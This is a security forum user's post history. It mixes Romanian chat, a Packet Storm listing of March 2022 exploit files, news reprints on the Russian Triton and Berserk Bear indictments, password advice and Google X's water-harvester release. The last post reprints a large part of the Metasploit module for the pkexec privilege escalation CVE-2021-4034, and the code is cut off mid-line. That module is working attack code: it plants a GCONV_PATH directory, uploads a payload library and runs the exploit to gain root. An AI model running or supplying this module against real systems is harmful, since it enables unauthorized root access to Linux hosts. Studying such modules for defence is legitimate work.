-
Posts
1026 -
Joined
-
Days Won
55
Everything posted by Kev
-
Salut, cunoaste cineva o aplicatie prin google store (gratuita) pentru a trimite SMS cu sender ID personalizat, eventtual si calling, pentru Android . smsglobal facea asta intr-un timp, acum au restrictii. Thanks Edit: uitat sa precizez ca doresc sa trimit de pe SIM, minute/sms nelimitat in orice retea
-
Poate te ajuta:
-
Folosesti GSA? Daca le scrii manual iti ofer 10 / euro pe articol
-
se pot recupera, il faci pierdut in Kiev
-
Salut, platesc sau nu? Am de doua luni bannere de la ei, nu am un click shareasale.[.com] 0 balance trafic organic 20k - 30k unic zilnic Multumesc
-
Evita fiverr si click share, cauta Get Real and Organic... Ce mai vrei pe acolo
-
This archive contains all of the 170 exploits added to Packet Storm in March, 2022. \Downloads\202203-exploits\202203-exploits\2203-exploits 04/04/2022 12:18 AM <DIR> . 04/04/2022 12:18 AM <DIR> .. 03/26/2022 10:22 PM 9,710 akhlutprowlingterror.py.txt 03/26/2022 11:33 PM 1,215 ALLMediaServer1.6-PPP-Buffer.py.txt 03/22/2022 01:20 AM 3,279 amazingcdripper12-overflow.txt 03/16/2022 07:46 PM 2,938 apacheapisix2121-exec.txt 03/07/2022 07:27 PM 7,855 apache_apisix_api_default_token_rce.rb.txt 03/07/2022 07:23 PM 3,057 aps10-exec.txt 03/07/2022 07:22 PM 1,710 aps10-sql.txt 03/14/2022 09:40 PM 1,820 aqpgs10-insecure.txt 03/14/2022 09:46 PM 1,155 aqpgs10-xss.txt 03/30/2022 05:24 PM 3,033 atomcms20-shell.txt 03/09/2022 06:40 PM 2,920 audioconvwiz201-overflow.txt 03/14/2022 09:35 PM 461 baixarglpi946-sql.txt 03/10/2022 08:09 PM 1,139 battleye09-unquotedpath.txt 03/28/2022 06:46 PM 4,356 c19dvs10hz-sql.txt 03/28/2022 06:43 PM 6,149 c19dvs10sa-sql.txt 03/02/2022 07:55 PM 1,769 cdsm10-sql.txt 03/07/2022 07:08 PM 1,144 cloudflarewarp14-unquoted.path.txt 03/09/2022 06:07 PM 1,136 cobianbackup09-unquotedpath.txt 03/30/2022 05:29 PM 1,254 cszcms129-sql.txt 03/31/2022 07:50 PM 3,198 CVE-2022-27248.txt 03/31/2022 07:47 PM 3,356 CVE-2022-27249.txt 03/03/2022 07:50 PM 8,974 cve_2021_4034_pwnkit_lpe_pkexec.rb.txt 03/10/2022 08:24 PM 5,704 cve_2022_0847_dirtypipe.rb.txt 03/16/2022 08:24 PM 13,482 cve_2022_21999_spoolfool_privesc.rb.txt 03/15/2022 06:41 PM 1,254 cwms10-sql.txt 03/09/2022 06:43 PM 715 deos-xss.txt 03/08/2022 05:58 PM 7,335 dirtypipez.c 03/23/2022 06:54 PM 547 drupalau7x-xss.txt 03/31/2022 07:39 PM 1,444 egfa2020-unquotedpath.txt 03/24/2022 05:42 PM 3,350 ems10-shell.txt 03/11/2022 07:32 PM 1,824 epes10-sql.txt 03/29/2022 06:39 PM 4,649 fa10-bypass.txt 03/29/2022 06:37 PM 4,728 fa10-shell.txt 03/29/2022 06:34 PM 2,193 fa10-sql.txt 03/01/2022 06:17 PM 23,402 firefox_jit_use_after_free.rb.txt 03/11/2022 07:25 PM 1,096 flex1085-disclose.txt 03/24/2022 05:33 PM 1,780 foxitpdfeditor1131-upload.txt 03/07/2022 07:07 PM 1,197 foxitpdfreader110-unquotedpath.txt 03/16/2022 08:16 PM 6,864 GS20220316171453.tgz 03/18/2022 06:35 PM 4,891 GS20220318153514.tgz 03/24/2022 05:09 PM 6,013 GS20220324140627.txt 03/30/2022 05:54 PM 6,772 GS20220330145441.tgz 03/31/2022 07:44 PM 4,808 GS20220331164324.tgz 03/07/2022 07:21 PM 1,279 hasuragraphql220-disclose.txt 03/16/2022 08:09 PM 831 hikvision-backdoor.txt 03/21/2022 08:39 PM 1,255 hocms10-sqlexec.txt 03/22/2022 06:33 PM 2,710 icehrm31000S-xsrf.txt 03/23/2022 07:06 PM 6,631 impresscms142preauth-exec.txt 03/14/2022 09:37 PM 2,771 insurancemgmtsys10-sql.txt 03/21/2022 08:34 PM 1,655 inventorymgmsys10-sqlexec.txt 03/21/2022 08:33 PM 793 inventorymgmtsys10-xss.txt 03/22/2022 06:29 PM 5,418 irzmr-xsrfexec.txt 03/22/2022 06:22 PM 1,104 ivantiem46-exec.txt 03/22/2022 06:17 PM 3,053 KIS-2022-01.txt 03/22/2022 06:36 PM 2,011 KIS-2022-02.txt 03/22/2022 06:38 PM 2,027 KIS-2022-03.txt 03/22/2022 06:39 PM 2,560 KIS-2022-04.txt 03/30/2022 05:49 PM 2,733 KIS-2022-05.txt 03/30/2022 05:39 PM 3,738 kramerviaware25-exec.txt 03/15/2022 06:52 PM 1,464 lmlp216-shell.txt 03/07/2022 07:07 PM 1,153 malwarebytes45-unquotedpath.txt 03/07/2022 07:10 PM 2,777 matrimony10-sql.txt 03/10/2022 08:10 PM 1,228 mcafeesafeconnect-unquotedpath.txt 03/29/2022 06:40 PM 1,748 messagesystem10-lfi.txt 03/29/2022 06:41 PM 2,982 messagesystem10-shell.txt 03/31/2022 07:29 PM 2,657 messagesystem10-sql.txt 03/31/2022 07:28 PM 935 messagesystem10-xss.txt 03/30/2022 05:31 PM 1,766 mhds10-lfi.txt 03/30/2022 05:33 PM 4,411 mhds10-shell.txt 03/30/2022 05:34 PM 1,410 mhds10-sql.txt 03/30/2022 05:32 PM 931 mhds10-xss.txt 03/31/2022 07:33 PM 2,161 mhds10blind-sql.txt 03/26/2022 09:11 PM 2,533 microfinancems10-sql.txt 03/28/2022 06:23 PM 1,860 microfinancems10-xss.txt 03/24/2022 05:41 PM 1,615 mms10-sqlexec.txt 03/16/2022 08:13 PM 18,399 moodle3115-sql.txt 03/04/2022 07:01 PM 2,196 MVID-2022-0501.txt 03/04/2022 07:02 PM 1,928 MVID-2022-0502.txt 03/04/2022 07:15 PM 1,762 MVID-2022-0503.txt 03/04/2022 07:20 PM 2,411 MVID-2022-0504.txt 03/04/2022 07:17 PM 2,320 MVID-2022-0505.txt 03/04/2022 07:22 PM 2,204 MVID-2022-0506.txt 03/04/2022 07:23 PM 2,291 MVID-2022-0507.txt 03/04/2022 07:16 PM 1,931 MVID-2022-0508.txt 03/07/2022 07:11 PM 2,726 MVID-2022-0509.txt 03/07/2022 07:13 PM 6,512 MVID-2022-0510.txt 03/14/2022 09:48 PM 2,164 MVID-2022-0511.txt 03/14/2022 09:50 PM 1,800 MVID-2022-0512.txt 03/14/2022 09:56 PM 2,203 MVID-2022-0513.txt 03/14/2022 09:57 PM 3,795 MVID-2022-0514.txt 03/17/2022 09:18 PM 2,217 MVID-2022-0515.txt 03/17/2022 09:19 PM 1,761 MVID-2022-0516.txt 03/17/2022 09:20 PM 1,636 MVID-2022-0517.txt 03/17/2022 09:25 PM 1,920 MVID-2022-0518.txt 03/17/2022 09:25 PM 2,866 MVID-2022-0519.txt 03/17/2022 09:26 PM 3,182 MVID-2022-0520.txt 03/17/2022 09:26 PM 2,831 MVID-2022-0521.txt 03/22/2022 06:20 PM 1,853 MVID-2022-0522.txt 03/22/2022 06:32 PM 2,204 MVID-2022-0523.txt 03/27/2022 12:22 PM 2,259 MVID-2022-0524.txt 03/27/2022 05:44 PM 1,911 MVID-2022-0525.txt 03/28/2022 06:47 PM 3,036 MVID-2022-0526.txt 03/28/2022 06:26 PM 2,222 MVID-2022-0527.txt 03/28/2022 06:27 PM 2,132 MVID-2022-0528.txt 03/28/2022 06:33 PM 2,651 MVID-2022-0529.txt 03/26/2022 09:22 PM 2,616 onechurchms10-sql.txt 03/26/2022 09:02 PM 4,108 onechurchms10-xss.txt 03/28/2022 06:31 PM 2,661 onlinebankingsys10-sql.txt 03/24/2022 05:26 PM 2,200 oscbs10-bypass.txt 03/24/2022 05:27 PM 1,078 oscbs10-sql.txt 03/22/2022 01:34 AM 7,676 oxappsuite7-xss.txt 03/07/2022 07:14 PM 724 partdb0511-exec.txt 03/28/2022 06:41 PM 1,390 pdfgwa10-sql.txt 03/22/2022 01:27 AM 3,379 pfms10-shell.txt 03/04/2022 07:23 PM 8,920 pfsense_diag_routes_webshell.rb.txt 03/27/2022 09:22 PM 1,884 pgwaut10-lfi.txt 03/07/2022 07:12 PM 1,717 pia33-unquotedpath.txt 03/04/2022 07:03 PM 5,846 pkexec_priv_esc.zip 03/16/2022 08:11 PM 4,141 pluckcms4716-shell.txt 03/30/2022 05:37 PM 4,197 postgres93117-exec.txt 03/09/2022 06:16 PM 8,771 printixclient1311060-escalate.txt 03/02/2022 07:49 PM 12,369 printixclient1311060-exec.txt 03/23/2022 06:57 PM 1,305 protonvpn1260-unquotedpath.txt 03/02/2022 07:56 PM 2,350 prowisereflect109-inject.txt 03/27/2022 02:11 PM 3,081 pspgs10-shell.txt 03/27/2022 01:11 PM 3,950 pspgs10-sql.txt 03/28/2022 06:37 PM 1,865 rems10-escalate.txt 03/28/2022 06:38 PM 1,789 rems10-xss.txt 03/01/2022 06:11 PM 1,657 rufus317-dllhijack.txt 03/10/2022 08:11 PM 848 sandboxieplus5502-unquotedpath.txt 03/21/2022 08:26 PM 4,206 sapkw7-xss.txt 03/29/2022 06:32 PM 2,585 scbs10-lfi.txt 03/24/2022 05:30 PM 3,290 scbs10-shell.txt 03/24/2022 05:39 PM 1,871 scbs10-sqlexec.txt 03/11/2022 07:34 PM 2,503 seowonslr120-exec.txt 03/14/2022 09:37 PM 1,666 sgs10-sql.txt 03/25/2022 06:15 PM 1,601 SICK-2022-40.sh.txt 03/10/2022 08:15 PM 1,863 siemenss71200-bypass.txt 03/18/2022 06:33 PM 416 smcw10-xss.txt 03/10/2022 08:08 PM 1,265 sonyplaymemorieshome-unquotedpath.txt 03/31/2022 07:36 PM 1,668 spoofer146-escalate.txt 03/07/2022 07:18 PM 3,529 springcloudgw310-exec.txt 03/31/2022 07:56 PM 3,813 spring_cloud_function_spel_injection.rb.txt 03/22/2022 06:19 PM 1,610 sysaxftpautomation690-escalate.txt 03/28/2022 06:48 PM 7,131 SYSS-2021-058.txt 03/11/2022 07:29 PM 686 tdarr20015-exec.txt 03/16/2022 07:50 PM 2,775 tfm246-shell.txt 03/24/2022 05:35 PM 685 tmvmi6-dos.txt 03/14/2022 09:43 PM 1,172 vivers1004-unquotedpath.txt 03/09/2022 06:14 PM 6,901 webmin1984-exec.txt 03/09/2022 06:06 PM 1,568 wondersharedrfone12018-unquotedpath.txt 03/10/2022 08:11 PM 842 wow215019-unquotedpath.txt 03/23/2022 06:50 PM 826 wpaae373-fileread.txt 03/28/2022 06:32 PM 1,054 wpawcc22-lfi.txt 03/30/2022 05:27 PM 975 wpcfc103-lfi.txt 03/30/2022 05:44 PM 3,914 wpcleantalk5173-xss.txt 03/30/2022 05:21 PM 710 wpclipr123-xss.txt 03/30/2022 05:19 PM 1,082 wpcurtain102-xsrf.txt 03/30/2022 05:22 PM 1,000 wpddf716-xss.txt 03/30/2022 05:47 PM 1,216 wpecp162-xss.txt 03/21/2022 08:29 PM 2,317 wpiqbc1213-filedelete.txt 03/30/2022 05:28 PM 1,153 wpvsp174-lfi.txt 03/08/2022 05:55 PM 4,372 write_anything.c 03/02/2022 07:51 PM 2,401 xerte3103-traversal.txt 03/02/2022 07:53 PM 5,988 xerte39-exec.txt 03/22/2022 01:21 AM 8,047 xlightftp3932-overflow.txt 03/10/2022 08:17 PM 5,090 zabbix5017-exec.txt 03/22/2022 01:36 AM 4,365 ZSL-2022-5699.txt 03/22/2022 01:38 AM 2,024 ZSL-2022-5700.txt 03/02/2022 07:59 PM 700 zywall2pisa-xss.txt 171 File(s) 528,601 bytes 2 Dir(s) 26,908,090,368 bytes free Download: 202203-exploits.tgz (192.6 KB) Source
-
- 1
-
Unsealed indictments: Hackers targeted US energy infrastructure for nearly a decade. Enlarge / Critical infrastructure sites such as this oil refinery in Port Arthur, Texas, rely on safety systems. For years, the hackers behind the malware known as Triton or Trisis have stood out as a uniquely dangerous threat to critical infrastructure: a group of digital intruders who attempted to sabotage industrial safety systems, with physical, potentially catastrophic results. Now the US Department of Justice has put a name to one of the hackers in that group—and confirmed the hackers' targets included a US company that owns multiple oil refineries. On Thursday, just days after the White House warned of potential cyberattacks on US critical infrastructure by the Russian government in retaliation for new sanctions against the country, the Justice Department unsealed a pair of indictments that together outline a years-long campaign of Russian hacking of US energy facilities. In one set of charges, filed in August 2021, authorities name three officers of Russia's FSB intelligence agency accused of being members of a notorious hacking group known as Berserk Bear, Dragonfly 2.0, or Havex, known for targeting electrical utilities and other critical infrastructure worldwide, and widely suspected of working in the service of the Russian government. The second indictment, filed in June 2021, levels charges against a member of an arguably more dangerous team of hackers: a Russian group known variously as the Triton or Trisis actor, Xenotime or Temp.Veles. That second group didn't merely target energy infrastructure worldwide but also took the rare step of inflicting real disruption in the Saudi oil refinery Petro Rabigh in 2017, infecting its networks with potentially destructive malware, and—the indictment alleges for the first time—attempting to break into a US oil-refining company with what appeared to be similar intentions. At the same time, a new advisory from the FBI cyber division warns that Triton "remains [a] threat," and that the hacker group associated with it "continues to conduct activity targeting the global energy sector." Enlarge / Gladkikh and alleged co-conspirators at a Russian research institute are accused of being members of the uniquely dangerous Triton hacker group. The indictment of Evgeny Viktorovich Gladkikh, a staffer at the Moscow-based Kremlin-linked Central Scientific Research Institute of Chemistry and Mechanics (typically abbreviated TsNIIKhM), charges him and unnamed co-conspirators with developing the Triton malware and deploying it to sabotage Petro Rabigh's so-called safety instrumented systems, sabotaging equipment intended to automatically monitor for and respond to unsafe conditions. The hacking of those safety systems could have led to disastrous leaks or explosions but instead triggered a fail-safe mechanism that twice shut down the Saudi plant's operations. Prosecutors also suggest that Gladkikh and his collaborators appear to have tried to inflict a similar disruption on a specific but unnamed US oil refining firm, but failed. "Now we have confirmation from the government," says Joe Slowik, a researcher at security firm Gigamon who analyzed the Triton malware when it first appeared and has tracked the hackers behind it for years. "We have an entity that was playing around with a safety-instrumented system in a high-risk environment. And to try to do that not just in Saudi Arabia, but in the United States, is concerning." The indictment alleges that in February 2018, just two months after the Triton malware deployed at Petro Rabigh had been discovered by cybersecurity firms FireEye and Dragos, staffers at TsNIIKhM began researching US refineries, seeking out US government research papers that could detail which US refineries had the most capacity, the potential effects of fires or explosions at those facilities, and their vulnerability to nuclear attacks or other disasters. The next month, prosecutors say, Gladkikh began searching for job postings that might reveal which industrial control system software was used at a specific US company that owned multiple refineries named in those government reports. From March until July 2018, Gladkikh then allegedly targeted that company's network with attempted SQL injection attacks, a technique that exploits vulnerabilities in a web interface to try to gain access to underlying databases, as well as repeatedly scanning the company's systems for other vulnerabilities. None of those intrusion attempts ever succeeded, the indictment suggests. As limited as those details may be, the indictment against Gladkikh represents the most concrete claims yet that the hackers behind Triton tried—and failed—to inflict disruption on US systems. But it isn't the first time they've been revealed to be probing American systems. In 2019, cybersecurity firm Dragos found that the Triton hackers—which Dragos calls "Xenotime"—had scanned the networks of at least 20 different US electric system targets, including every element of the US grid from power generation plants, transmission stations, and distribution stations, though the company never released evidence of more than surface-level attempts at intrusion against those US energy firms. "The whole Xenotime operation is bigger than what the Justice Department dropped," says Sergio Caltagirone, the vice president of threat intelligence at Dragos. "That's just a slice of what has been going on." Aside from the Gladkikh indictment, the Justice Department's charges against three FSB hackers—Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov, and Marat Valeryevich Tyukov—puts names for the first time to a decade-long series of intrusions targeting power grids and other critical infrastructure worldwide. The indictment confirms the FSB association of that group, most commonly known as Berserk Bear, which has been tied to breaches of those infrastructure targets stretching back to 2012, with victims ranging from the Wolf Creek nuclear energy facility to the San Francisco International Airport. Unlike the Triton hackers, however, that FSB-linked group has strangely never actually triggered disruptive effects in a confirmed case, even when it had fingers-on-the-switch access to US electric utilities. On top of the two indictments, the Department of Energy, FBI, and CISA released advisories Thursday to US critical infrastructure firms, listing the techniques of both the TsNIIKhM-based hackers responsible for Triton and the FSB-linked group, along with recommended countermeasures. The FBI warns in its advisory that the potential effects of attacks by the Triton hackers, specifically, “could be similar to cyberattacks previously attributed to Russia that caused blackouts in Ukraine in 2015 and 2016”—incidents that were, in fact, caused by a different hacker group known as Sandworm, working in the service of Russia's GRU military intelligence agency. Both advisories—and the unsealing of indictments against the two groups—follow vague but foreboding White House warnings earlier this week that Russia has engaged in "preparatory activity" for cyberattacks on US critical infrastructure. The intention, argues Gigamon's Slowik, isn't merely to warn US network defenders to bolster their defenses but also to demonstrate to the Kremlin that the US government has been able to track—and identify the people responsible for—its hacking activity, stretching back years. "The message is that the US government has good insight and visibility into Russian cyberoperations," says Slowik. “The message is ‘hey, we’re tracking you, and tracking you quite thoroughly.’” Source: arstechnica.com
-
Posibil sa fi cautat lumea dictionare a fost up cand am postat: isi revine, don't worry
-
Here’s a strong password: Mi7ki#Gi3na&Go1ld$ Do not use it anywhere. Read the following to understand how we came up with this password, and use a similar logic to make passwords from words you can remember, without telling anyone! This is for educational purposes only. Why is this a strong password? Based on the latest research from Carnegie Mellon University, strong passwords have at least 12 characters (the longer, the better), do not contain any dictionary words (the hackers use databases with common words), and have uppercase and special characters at non-obvious places (the hackers know if you put special characters in the obvious places, like replacing a 5 with an S). You can copy the password above and paste it in the Carnegie Mellon Password Strength Meter to see how strong it is, and tweak it to make it even more stronger. How can I remember this password? Here’s the logic we used to make this password from the three words you entered: First, we capitalized the words. That you can easily remember! It's better to capitalize random letters of each word, but this password does not include that because there is already enough complexity which makes it strong. Then, we inserted a number in the middle of each word, to make it unidentifiable as a dictionary word. For example, ca8ts is harder to guess than cats. You can insert any three numbers you like and remember that. Finally, we inserted special characters between the words. You can pick your own special characters. In combination, this password is long and complex enough that it is hard to guess, but is also based on three words you like, so it’s easy to remember. Why not just use "mikiginagold"? Because it’s too easy to guess, unless you chose three words that don’t exist in the dictionary. Even then, we recommend you insert some numbers and special characters somewhere in the middle so they increase in complexity. You can play around with the Carnegie Mellon Password Strength Meter tool. Why three words? Why not just two words and numbers and special characters? The longer the password, the harder it is to guess, and the stronger it is. It takes exponentially more effort for hackers to crack a longer password. This is really really important. Why not just "miki123" or "gina123" or "gold123"? Never ever use these! It’s very common for people to simply add 123 or 123! to their favorite words and use that string as a password, but such passwords are the weakest and can be guessed very easily. Millions of passwords have been breached and stored in hacker databases, and xxx123! are very common in them. Why are strong passwords important? Because passwords are stolen all the time, and if your password is weak, it can be guessed and your accounts can be breached. Did you know that you can actually find out if any of your existing passwords may have been breached? Go to https://monitor.firefox.com/ and enter your email address. It will show you all your passwords that may have been breached. What else can I do to keep my passwords safe? First, use strong passwords for all accounts with the logic explained above. If any of your online accounts support social logins via Google or Facebook, use that and avoid creating a password! Second, use unique passwords for each of your online accounts. Do not use the same password for multiple accounts. If one is breached, you don’t want the others to be exposed as well. Third, enable two-factor authentication when possible. Even if your account is breached, two-factor allows you to confirm when someone is trying to login to your accounts–that’s a good safety mechanism. Finally, keep an eye on password breaches by registering at https://monitor.firefox.com/ . It will email you if any of your passwords were found in a breach, and you can change them immediately. Link: https://makestrongpassword.com/ Source: Google
-
Quartet accused in two major hacking campaigns between 2012 and 2018, indictment unsealed by justice department reads The Russian hackers targeted the global energy sector in campaigns that affected thousands of computers across 135 countries. Photograph: Dimitar Dilkoff/AFP/Getty Images The US has unveiled criminal charges against four Russian government officials, saying they engaged in two major hacking campaigns between 2012 and 2018 that targeted the global energy sector and affected thousands of computers across 135 countries. In one now-unsealed indictment from August 2021, the justice department said three alleged hackers from Russia’s Federal Security Service (FSB) carried out cyber-attacks on the computer networks of oil and gas firms, nuclear power plants, and utility and power transmission companies across the world between 2012 and 2017. The three accused Russians in that case are Pavel Aleksandrovich Akulov, 36, Mikhail Mikhailovich Gavrilov, 42, and Marat Valeryevich Tyukov, 39. In a second unsealed indictment from June 2021, the DoJ accused Evgeny Viktorovich Gladkikh, a 36-year-old Russian ministry of defense research institute employee, of conspiring with others between May and September 2017 to hack the systems of a foreign refinery and install malware known as “Triton” on a safety system produced by Schneider Electric. The justice department unsealed the two cases just days after US president Joe Biden warned about “evolving intelligence” suggesting the Russian government is exploring options for more cyber-attacks in the future. A department official told reporters on Thursday that even though the hacking at issue in the two cases occurred years ago, investigators remained concerned Russia will continue to launch similar attacks. These charges show the dark art of the possible when it comes to critical infrastructure,” the official said. The official added that the four accused Russians are not in custody, but the department decided to unseal the indictments because they determined the “benefit of revealing the results of the investigation now outweighs the likelihood of arrests in the future.” The 2017 attack stunned the cybersecurity community when it was made public by researchers later that year because – unlike typical digital intrusions aimed at stealing data or holding it for ransom – it appeared aimed at causing physical damage to the facility itself by disabling its safety system. US officials have been tracking the case and its aftershocks ever since. In 2019, those behind Triton were reported to be scanning and probing at least 20 electric utilities in the United States for vulnerabilities. The following year – two weeks before the 2020 US presidential election – the US treasury department sanctioned the Russian government-backed Central Scientific Research Institute of Chemistry and Mechanics, where Gladkikh is alleged to have worked. The news of the indictment represents “a shot across the bow” to any Russian hacking groups that might be poised to carry out destructive attacks against US critical infrastructure, said John Hultquist of the cybersecurity firm Mandiant. Now that these criminal charges are public, he added, the United States has “let them know that we know who they are.”. Source: theguardian.com
-
este vechi, il stiu, are 7, 8 ani aproximativ,...
-
Summary: Over 2 billion people do not have access to safe drinking water. H2E was a project at X that aimed to tackle this challenge by creating a device that individual households could use to harvest water from the air. The team aimed to build a highly lightweight, portable, cheap (<5% of user’s income) device that an individual could use to produce 5L of drinking water per day. This is no longer an active project at X, so we are releasing our technical documents to allow others to build on our progress to date. To do so, we have made the following items public: Nature paper with key findings Tools/code that enabled findings shared in the paper, and others in the AWH community can use, including: “AWH-Geo” which can estimate the water output over time of any AWH device. This can then be used to estimate the potential user base and impact of an AWH device. On GitHub “JMP GeoProcessor” which uses geographic information systems (GIS) to process the UNICEF/WHO data and join them to proper geographic boundaries. In FigShare Much of the data analysis code used to produce the figures & charts in the study. On GitHub Two datasets on FigShare Hardware assembly documentation CAD files of our prototype device: These can be found in the folder called “CAD_files” “Assembly_documentation.pdf”, this document details our prototype assembly process and learnings Patent Non-Assertion Pledge Data and geospatial tools around access to safe drinking water are provided here to aid academic reproducibility and advancement in the context of the Nature Paper “Global Potential of Harvesting Drinking Water from Air using Solar Energy”. They should not be used for decision making without extensive validation. This caveat applies even more strongly outside the field of atmospheric water generation, where assumptions and approximations made may not be suitable . Users are encouraged to use the official public sources (primarily WHO/UNICEF JMP) from which they are derived. Data and results capture a snapshot at the time of research, and are compiled at the time of publication (2021-10-27). They will not be updated, even as underlying realities change. The prototype described here is a purely experimental device. While substitutions and modifications are reasonably straightforward, water harvested with this experimental device is not intended to be ingested. Among other design choices, adhesives were selected for experimental performance and would need to be substitued with ones meeting food grade standards. The views expressed in the paper and co-released documentation are the author’s, and not necessarily the views of authors’ employers. Download: h2e_technical_documentation-main.zip or git clone https://github.com/google/h2e_technical_documentation.git Source
-
Carti depenetrare si practica pentru incepatori
Kev replied to Picu_Motanu94's topic in Discutii incepatori
https://rstforums.com/forum/search/?&q=penetration testing &quick=1&search_and_or=and&sortby=relevancy -
open98: Windows NT like Kernel
Kev replied to noobes's topic in Sisteme de operare si discutii hardware
pune-l in categoria [RST] Projects, ce zice @Nytro fac teste -
This is a Metasploit module for the argument processing bug in the polkit pkexec binary. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument list and populate the proper environment variables. This exploit is architecture independent. Download: ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Local Privilege Escalation in polkits pkexec', 'Description' => %q{ A bug exists in the polkit pkexec binary in how it processes arguments. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument list and populate the proper environment variables. This exploit is architecture independent. }, 'License' => MSF_LICENSE, 'Author' => [ 'Qualys Security', # Original vulnerability discovery 'Andris Raugulis', # Exploit writeup and PoC 'Dhiraj Mishra', # Metasploit Module 'bwatters-r7' # Metasploit Module ], 'DisclosureDate' => '2022-01-25', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'x86_64', { 'Arch' => [ ARCH_X64 ] } ], [ 'x86', { 'Arch' => [ ARCH_X86 ] } ], [ 'aarch64', { 'Arch' => [ ARCH_AARCH64 ] } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true }, 'Privileged' => true, 'References' => [ [ 'CVE', '2021-4034' ], [ 'URL', 'https://www.whitesourcesoftware.com/resources/blog/polkit-pkexec-vulnerability-cve-2021-4034/' ], [ 'URL', 'https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt' ], [ 'URL', 'https://github.com/arthepsy/CVE-2021-4034' ], # PoC Reference [ 'URL', 'https://www.ramanean.com/script-to-detect-polkit-vulnerability-in-redhat-linux-systems-pwnkit/' ], # Vuln versions [ 'URL', 'https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py' ] # vuln versions ], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK ] } ) ) register_options([ OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('PKEXEC_PATH', [ false, 'The path to pkexec binary', '' ]) ]) register_advanced_options([ OptString.new('FinalDir', [ true, 'A directory to move to after the exploit completes', '/' ]), ]) end def on_new_session(new_session) # The directory the payload launches in gets deleted and breaks some commands # unless we change into a directory that exists super old_session = @session @session = new_session cd(datastore['FinalDir']) @session = old_session end def find_pkexec vprint_status('Locating pkexec...') if exists?(pkexec = cmd_exec('which pkexec')) vprint_status("Found pkexec here: #{pkexec}") return pkexec end return nil end def check # Is the arch supported? arch = kernel_hardware unless arch.include?('x86_64') || arch.include?('aarch64') || arch.include?('x86') return CheckCode::Safe("System architecture #{arch} is not supported") end # check the binary pkexec_path = datastore['PKEXEC_PATH'] pkexec_path = find_pkexec if pkexec_path.empty? return CheckCode::Safe('The pkexec binary was not found; try populating PkexecPath') if pkexec_path.nil? # we don't use the reported version, but it can help with troubleshooting version_output = cmd_exec("#{pkexec_path} --version") version_array = version_output.split(' ') if version_array.length > 2 pkexec_version = Rex::Version.new(version_array[2]) vprint_status("Found pkexec version #{pkexec_version}") end return CheckCode::Safe('The pkexec binary setuid is not set') unless setuid?(pkexec_path) # Grab the package version if we can to help troubleshoot sysinfo = get_sysinfo begin if sysinfo[:distro] =~ /[dD]ebian/ vprint_status('Determined host os is Debian') package_data = cmd_exec('dpkg -s policykit-1') pulled_version = package_data.scan(/Version:\s(.*)/)[0][0] vprint_status("Polkit package version = #{pulled_version}") end if sysinfo[:distro] =~ /[uU]buntu/ vprint_status('Determined host os is Ubuntu') package_data = cmd_exec('dpkg -s policykit-1') pulled_version = package_data.scan(/Version:\s(.*)/)[0][0] vprint_status("Polkit package version = #{pulled_version}") end if sysinfo[:distro] =~ /[cC]entos/ vprint_status('Determined host os is CentOS') package_data = cmd_exec('rpm -qa | grep polkit') vprint_status("Polkit package version = #{package_data}") end rescue StandardError => e vprint_status("Caught exception #{e} Attempting to retrieve polkit package value.") end if sysinfo[:distro] =~ /[fF]edora/ # Fedora should be supported, and it passes the check otherwise, but it just # does not seem to work. I am not sure why. I have tried with SeLinux disabled. return CheckCode::Safe('Fedora is not supported') end # run the exploit in check mode if everything looks right if run_exploit(true) return CheckCode::Vulnerable end return CheckCode::Safe('The target does not appear vulnerable') end def find_exec_program return 'python' if command_exists?('python') return 'python3' if command_exists?('python3') return nil end def run_exploit(check) if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end arch = kernel_hardware vprint_status("Detected architecture: #{arch}") if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch')) fail_with(Failure::BadConfig, 'Host/payload Mismatch; set target and select matching payload') end pkexec_path = datastore['PKEXEC_PATH'] if pkexec_path.empty? pkexec_path = find_pkexec end python_binary = find_exec_program # Do we have the pkexec binary? if pkexec_path.nil? fail_with Failure::NotFound, 'The pkexec binary was not found; try populating PkexecPath' end # Do we have the python binary? if python_binary.nil? fail_with Failure::NotFound, 'The python binary was not found; try populating PythonPath' end unless writable? datastore['WRITABLE_DIR'] fail_with Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable" end local_dir = ".#{Rex::Text.rand_text_alpha_lower(6..12)}" working_dir = "#{datastore['WRITABLE_DIR']}/#{local_dir}" mkdir(working_dir) register_dir_for_cleanup(working_dir) random_string_1 = Rex::Text.rand_text_alpha_lower(6..12).to_s random_string_2 = Rex::Text.rand_text_alpha_lower(6..12).to_s @old_wd = pwd cd(working_dir) cmd_exec('mkdir -p GCONV_PATH=.') cmd_exec("touch GCONV_PATH=./#{random_string_1}") cmd_exec("chmod a+x GCONV_PATH=./#{random_string_1}") cmd_exec("mkdir -p #{random_string_1}") payload_file = "#{working_dir}/#{random_string_1}/#{random_string_1}.so" unless check upload_and_chmodx(payload_file.to_s, generate_payload_dll) register_file_for_cleanup(payload_file) end exploit_file = "#{working_dir}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" write_file(exploit_file, exploit_data('CVE-2021-4034', 'cve_2021_4034.py')) register_file_for_cleanup(exploit_file) cmd = "#{python_binary} #{exploit_file} #{pkexec_path} #{payload_file} #{random_string_1} 